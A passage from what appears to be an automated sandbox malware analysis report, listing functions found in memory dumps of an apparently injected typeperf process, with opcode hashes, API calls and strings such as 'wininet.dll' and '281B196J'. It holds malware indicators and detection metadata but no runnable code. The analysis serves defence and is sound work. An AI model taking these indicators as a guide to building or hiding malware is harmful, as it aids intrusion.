                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: a4afedf06247e7fd734a442399bee7bc6f2931e75fd17672967a53ba0663dcb0
                                                                                                                        • Instruction ID: eafbea04987dcc512024965e57295c55c3c4d059534ee883b6fc6149f088e7cf
                                                                                                                        • Opcode Fuzzy Hash: a4afedf06247e7fd734a442399bee7bc6f2931e75fd17672967a53ba0663dcb0
                                                                                                                        • Instruction Fuzzy Hash: 2F90026535140842D100B15C4454F060005C7E1301F55C015F5064954D8719CD526526
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: dd6616905e5a785c1015ec351275ffd27a45e6291d19a28d7e86dad436ad7a61
                                                                                                                        • Instruction ID: 3327f9eb28643706fab1087bdda9ddbf88d358396099a077112ae4cbe9bf7161
                                                                                                                        • Opcode Fuzzy Hash: dd6616905e5a785c1015ec351275ffd27a45e6291d19a28d7e86dad436ad7a61
                                                                                                                        • Instruction Fuzzy Hash: 50900225711404424140B16C8884D064005ABE1211755C121B4998950D865989655A65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 0080543c4d80b6be1a0e6dde3ea8d46439f4edc6920ed4dace9ad78e8491bd14
                                                                                                                        • Instruction ID: 21cdd15676a8daa57fa5a5818b9428d315d40c9642e2c325de8f4468382a62a2
                                                                                                                        • Opcode Fuzzy Hash: 0080543c4d80b6be1a0e6dde3ea8d46439f4edc6920ed4dace9ad78e8491bd14
                                                                                                                        • Instruction Fuzzy Hash: A1900225321C0442D200B56C4C54F07000587D0303F55C115B4154954CCA1589615921
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: c5004dc27e44d00940f531d53d05a501c36f4958bf068526816df0c87355a922
                                                                                                                        • Instruction ID: 7ccc6a26f094b5e27f5027e7dc6c8f5c906aeea9856ad06f2a731d4613531c9a
                                                                                                                        • Opcode Fuzzy Hash: c5004dc27e44d00940f531d53d05a501c36f4958bf068526816df0c87355a922
                                                                                                                        • Instruction Fuzzy Hash: 5890022571140902D101B15C4444A16000A87D0241F95C022B5024955ECB258A92A531
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 1dd94f63e2337a73f52a5f031585fe2053c936e787c77e45cfe0bf21741c9db2
                                                                                                                        • Instruction ID: a2663fb8f23a9c22c5a7bd8eb19d9de124c7c7eb284febf56e59626c13ef2d2c
                                                                                                                        • Opcode Fuzzy Hash: 1dd94f63e2337a73f52a5f031585fe2053c936e787c77e45cfe0bf21741c9db2
                                                                                                                        • Instruction Fuzzy Hash: 4D90026531180803D140B55C4844A07000587D0302F55C011B6064955E8B298D516535
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 24daa358e4c1112eb4c40e0be09bbb80ade69dda586bef2c47ddba74e9197727
                                                                                                                        • Instruction ID: 7ba2265b77af503367ca10c8e368da8003e50ec9ac231643a6981a7d7ca9e845
                                                                                                                        • Opcode Fuzzy Hash: 24daa358e4c1112eb4c40e0be09bbb80ade69dda586bef2c47ddba74e9197727
                                                                                                                        • Instruction Fuzzy Hash: 6490043531140403D140F15C545CF074005D7F1301F55D011F4414D54CDF15CD575733
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 1a765824ba586e3eeac5396e6af20ff357929eaa7b91d0bc339da75a5b94ba83
                                                                                                                        • Instruction ID: baa6689444fd621493ced8bc610885f0b43538869797b247354d8770d2019b28
                                                                                                                        • Opcode Fuzzy Hash: 1a765824ba586e3eeac5396e6af20ff357929eaa7b91d0bc339da75a5b94ba83
                                                                                                                        • Instruction Fuzzy Hash: 9F90022D32340402D180B15C5448A0A000587D1202F95D415B4015958CCA1589695721
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 8531d5dce6e368bc9acc06ea594f6c17ebce6814758f8b34d386ad184ce654aa
                                                                                                                        • Instruction ID: 403efc8ca8d7e98b0b5f153638de357df48acc39262065ff11f7ea8bb095351c
                                                                                                                        • Opcode Fuzzy Hash: 8531d5dce6e368bc9acc06ea594f6c17ebce6814758f8b34d386ad184ce654aa
                                                                                                                        • Instruction Fuzzy Hash: B890023531140813D111B15C4544B07000987D0241F95C412B4424958D97568A52A521
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: e2b209245e01e44b790abaafa6bfaa6ae147b922466d50ee7998d69b3812eb51
                                                                                                                        • Instruction ID: efa1bcec530731d5647ead4384109c8d476c9860e0ff7fc2de8ac7eb8bd355a5
                                                                                                                        • Opcode Fuzzy Hash: e2b209245e01e44b790abaafa6bfaa6ae147b922466d50ee7998d69b3812eb51
                                                                                                                        • Instruction Fuzzy Hash: 92900225352445525545F15C4444907400697E0241795C012B5414D50C86269956DA21
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 4ebd1311981561ba322b3f8cf5e7cf06f37434de2bec4e506aa07298835fe81d
                                                                                                                        • Instruction ID: 8e614be5c13f33bbaf7a1a6c45386f165c100f6f82a5aef4604c7d6d89b1fdac
                                                                                                                        • Opcode Fuzzy Hash: 4ebd1311981561ba322b3f8cf5e7cf06f37434de2bec4e506aa07298835fe81d
                                                                                                                        • Instruction Fuzzy Hash: 9C90023531148C02D110B15C8444B4A000587D0301F59C411B8424A58D879589917521
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 8b32500465fb9d4bf5aac98a03ce8209699f95134428e8f7619c9ea296142888
                                                                                                                        • Instruction ID: 22494132e714cbe30ab40bfd4e678160cfa91f160a89a39efe4418cbded46c1d
                                                                                                                        • Opcode Fuzzy Hash: 8b32500465fb9d4bf5aac98a03ce8209699f95134428e8f7619c9ea296142888
                                                                                                                        • Instruction Fuzzy Hash: B290023531140C42D100B15C4444F46000587E0301F55C016B4124A54D8715C9517921
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 03342CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: aeec47281bf18454749454fa248b2f038fc8dab59d6192dd55e879a092239d05
                                                                                                                        • Instruction ID: 9d267b3f87260306ea4b0301aa34937289bd18035de4a3563b7754eef2d559fa
                                                                                                                        • Opcode Fuzzy Hash: aeec47281bf18454749454fa248b2f038fc8dab59d6192dd55e879a092239d05
                                                                                                                        • Instruction Fuzzy Hash: 0F90023531140802D100B59C5448A46000587E0301F55D011B9024955EC76589916531
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 033435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: 37f1bda06e02736c1bcf79b0a30cfcdc1d2b4175493e7da1a399c4d30ba5e017
                                                                                                                        • Instruction ID: b83b2e952ddf0339777af608b881cdbf7d34985a845894bd02fe6d631ef79876
                                                                                                                        • Opcode Fuzzy Hash: 37f1bda06e02736c1bcf79b0a30cfcdc1d2b4175493e7da1a399c4d30ba5e017
                                                                                                                        • Instruction Fuzzy Hash: 1E90023571550802D100B15C4554B06100587D0201F65C411B4424968D87958A5169A2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 033439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3735730072.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.00000000033FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 0000000B.00000002.3735730072.000000000346E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_32d0000_typeperf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2994545307-0
                                                                                                                        • Opcode ID: b7c8c82c95d64d9db73e688e99a94202045367f0a2f5e9a455eade8b1ad4d5aa
                                                                                                                        • Instruction ID: e138faa18c975dea1cceb8da4771c0756981bb9d9e3003000022ac00632bd422
                                                                                                                        • Opcode Fuzzy Hash: b7c8c82c95d64d9db73e688e99a94202045367f0a2f5e9a455eade8b1ad4d5aa
                                                                                                                        • Instruction Fuzzy Hash: 9990022535545502D150B15C4444A164005A7E0201F55C021B4814994D865589556621
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02931810 Relevance: .4, Instructions: 399COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2340568224-0
                                                                                                                        • Opcode ID: 3f91aa267e219e3ea387a4d6cf9aa97010c200bc98021b092bc23a0cf3677046
                                                                                                                        • Instruction ID: 7f9d0632c8ac32c2335f8f1f611ba503080014968db0bad7eebe8f0cf94b953b
                                                                                                                        • Opcode Fuzzy Hash: 3f91aa267e219e3ea387a4d6cf9aa97010c200bc98021b092bc23a0cf3677046
                                                                                                                        • Instruction Fuzzy Hash: 7EE1A2B2D00218ABDB26DFA4DC81FEEB7BEBF84304F14455DE509A6141EB70A644CFA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 029305A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 175COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 0-2078129318
                                                                                                                        • Opcode ID: 9762407713ff644817e35d9308df0110265b9fe409896b9acc8cc3034e6ada6e
                                                                                                                        • Instruction ID: eb584b88241855d2d14e759ded352045f5e5e918e7d3a6d9bf01b536023ea16b
                                                                                                                        • Opcode Fuzzy Hash: 9762407713ff644817e35d9308df0110265b9fe409896b9acc8cc3034e6ada6e
                                                                                                                        • Instruction Fuzzy Hash: 5151017A5046D57BC713DB78CC906DABFB8FE8265CB1842C8D5C09B246D7229803CBD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0293071A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 02930797
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        • Opcode ID: babbf2150a9e427506c817a81ff2192fc319a6fdd0e3fe8d3650435ff123e8f0
                                                                                                                        • Instruction ID: 980e9dd8fc9590073c8a265c03d28f644812967647d81ccff0b2b75824829070
                                                                                                                        • Opcode Fuzzy Hash: babbf2150a9e427506c817a81ff2192fc319a6fdd0e3fe8d3650435ff123e8f0
                                                                                                                        • Instruction Fuzzy Hash: 5401A5B1D4024C7AEF1196E48C81DEF7B7CEF81394F048064FA44A7200D6245E078FA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02930720 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(281B196J,00000111), ref: 02930797
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostThread
                                                                                                                        • String ID: 281B196J$281B196J
                                                                                                                        • API String ID: 1836367815-2078129318
                                                                                                                        • Opcode ID: 0b3140bbe1c2e632b21ba99e7f9170f4a180fa3c975350499debbcf0f4afe7b9
                                                                                                                        • Instruction ID: 9771b0b8af3758fc71cd686b9bbe733bcd25275a68b79f0e3ba9b90a9324db45
                                                                                                                        • Opcode Fuzzy Hash: 0b3140bbe1c2e632b21ba99e7f9170f4a180fa3c975350499debbcf0f4afe7b9
                                                                                                                        • Instruction Fuzzy Hash: 760196B1D4025C7AEB11A6E58C81DFFBB7CEF81794F058064FA54A7240D6285E068FB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 02942164 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 121sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0294228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        • Opcode ID: d36aa3894ec25ac77e325119d23311a03226b07688fb568756581b01f6e36b29
                                                                                                                        • Instruction ID: b39fc1ebe8caa73c860d0c1f5b55b081540cd295e3584518273d0671f205d6dc
                                                                                                                        • Opcode Fuzzy Hash: d36aa3894ec25ac77e325119d23311a03226b07688fb568756581b01f6e36b29
                                                                                                                        • Instruction Fuzzy Hash: A93125B5A00601AFC315DFA4DC84FA6B7B9FF85308F10826EE9898B246DB316615CBD0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 029421B1 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0294228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        • Opcode ID: 20eb749de3e2cb08d55bbf57aa6fc2c2d0147607781f299ef201e781c35a81fb
                                                                                                                        • Instruction ID: 39048a68687625a3f1e57999007048941da91851e7bded90f499e085e4892372
                                                                                                                        • Opcode Fuzzy Hash: 20eb749de3e2cb08d55bbf57aa6fc2c2d0147607781f299ef201e781c35a81fb
                                                                                                                        • Instruction Fuzzy Hash: B331D0B4A00700ABD714DFA4DCC1FABBBB9FB88304F108569ED5D9B285D770A954CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 029421C0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0294228B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000B.00000002.3732982442.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_11_2_2920000_typeperf.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep
                                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                                        • Opcode ID: 4fb480d5a090fa9bca2caba1a29324f3cd706d0d2dc2d42277a95000270570b3
                                                                                                                        • Instruction ID: 46da66fd4fbf42a17fd549c3ab96da49aacd74c474297b6e3e8f878fa7cb4829
                                                                                                                        • Opcode Fuzzy Hash: 4fb480d5a090fa9bca2caba1a29324f3cd706d0d2dc2d42277a95000270570b3
